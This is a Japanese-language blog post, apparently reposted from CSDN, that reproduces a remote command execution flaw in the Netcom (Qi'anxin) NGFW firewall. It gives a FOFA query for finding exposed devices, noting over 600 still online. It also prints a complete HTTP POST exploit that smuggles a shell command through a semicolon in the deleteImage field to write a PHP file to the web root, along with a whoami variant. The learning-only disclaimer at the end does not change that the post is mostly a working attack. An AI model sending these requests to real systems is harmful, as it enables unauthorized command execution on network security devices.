脆弱性の再発 - Netcom (Qi'anxin) NGFW 次世代ファイアウォールのリモート コマンド実行

脆弱性の説明

Netcom Next Generation Firewall (NGFW) は、Netcom Technology が提供する、ネットワークの脅威に総合的に対応できる高性能アプリケーション層ファイアウォールです。この NGFW にはリモート コマンド実行の脆弱性があり、攻撃者は特別なリクエストを作成することでシステム コマンドを実行できます。強力なアプリケーション識別機能を備えた次世代ファイアウォールは、ネットワーク トラフィック内のユーザー、アプリケーション、コンテンツに関する詳細な洞察を得ることができ、新しい高性能シングルパス異種並列処理エンジンの助けを借りて、次世代ファイアウォールは次のことができます。インターネット下り、データセンター境界、アプリケーション サービス フロントエンドなどのシナリオでユーザーを検出および識別し、効率的なアプリケーション層に統合されたセキュリティ保護を提供して、ユーザーが安全にビジネスを遂行し、セキュリティ コストを削減できるようにします。

FOFA 構文:app="网康科技-下一代防火墙"

 6 月 23 日の時点で、fofa アセットはまだ 600 以上あります。

POC


POST /directdata/direct/router HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 188
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip

{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;echo '<?php echo md5(1);unlink(__FILE__);?>' >/var/www/html/testmd5.php"]}],"type":"rpc","tid":17}

このコマンドを実行すると、md5 値がエコーされ、ファイルが削除されます。

echo '<?php echo md5(1);unlink(__FILE__);?>' >/var/www/html/testmd5.php

 whoamiで直接認証することもできます

whoami >/var/www/html/whoami.txt

技術記事は参考用です。この記事で提供されている情報は学習のみを目的としています。記事内の技術情報を使用して、許可なくコンピュータ システムに侵入しないでください。この記事で提供される情報の使用によって引き起こされる直接的または間接的な結果および損失については、ユーザーが責任を負うものとします。この記事で提供されているツールは学習のみを目的としており、他の目的で使用することは許可されていません。

おすすめ

転載: blog.csdn.net/qq_17754023/article/details/131348284